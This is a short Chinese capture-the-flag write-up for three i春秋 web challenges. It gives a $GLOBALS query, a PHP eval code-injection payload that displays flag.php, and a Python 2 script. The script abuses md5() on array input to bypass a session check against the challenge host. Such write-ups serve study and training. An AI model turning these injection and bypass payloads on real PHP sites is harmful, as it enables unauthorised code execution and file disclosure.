i春秋 ctf web

爆破-1

全局变量$GLOBALS
?hello=GLOBALS

爆破-2

命令注入
?hello=);show_source('flag.php');//

eval( "var_dump($a);");
eval( "var_dump();show_source('flag.php');//);");

爆破-3

目标
$_SESSION['nums']>=10
条件
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;

md5()如果参数是数组则返回0
第一次请求参数为value[]=e&value[]=a

#coding=utf-8
import requests

url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]=e&value[]=a'
r=requests.get(url)
cookies={'PHPSESSID':r.headers['Set-Cookie'][10:36]}#获得会话id
for i in xrange(11):
    url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]={0}&value[]={1}'.format(r.content[0:1],r.content[1:2])
    print url
    r=requests.get(url,cookies=cookies)
    if i==10:
        print r.content